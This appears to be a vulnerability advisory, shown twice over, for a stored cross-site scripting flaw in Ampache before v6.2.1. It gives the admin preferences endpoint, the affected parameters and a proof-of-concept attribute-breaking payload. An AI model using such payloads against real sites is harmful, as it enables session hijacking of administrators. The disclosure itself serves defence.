Summary
Stored Cross Site Scripting (XSS) vulnerability in ampache before v6.2.1 allows a remote attacker to execute code via a crafted payload to serval parameters in the post request of /preferences.php?action=admin_update_preferences.
Severity: low
Details
POST /preferences.php?action=admin_update_preferences HTTP/1.1
Host: localhost
Origin: http://localhost
Referer: http://localhost/admin/users.php?action=show_preferences&user_id=1
The affected parameters include: api_hidden_playlists, libitem_browse_alpha, custom_blankalbum, custom_blankmovie and so on.
PoC
" onmouseout=alert(1) "
Impact
Stored XSS
CrownZTX Reporter
Summary
Stored Cross Site Scripting (XSS) vulnerability in ampache before v6.2.1 allows a remote attacker to execute code via a crafted payload to serval parameters in the post request of /preferences.php?action=admin_update_preferences.
Severity: low
Details
POST /preferences.php?action=admin_update_preferences HTTP/1.1
Host: localhost
Origin: http://localhost
Referer: http://localhost/admin/users.php?action=show_preferences&user_id=1
The affected parameters include: api_hidden_playlists, libitem_browse_alpha, custom_blankalbum, custom_blankmovie and so on.
PoC
" onmouseout=alert(1) "Impact
Stored XSS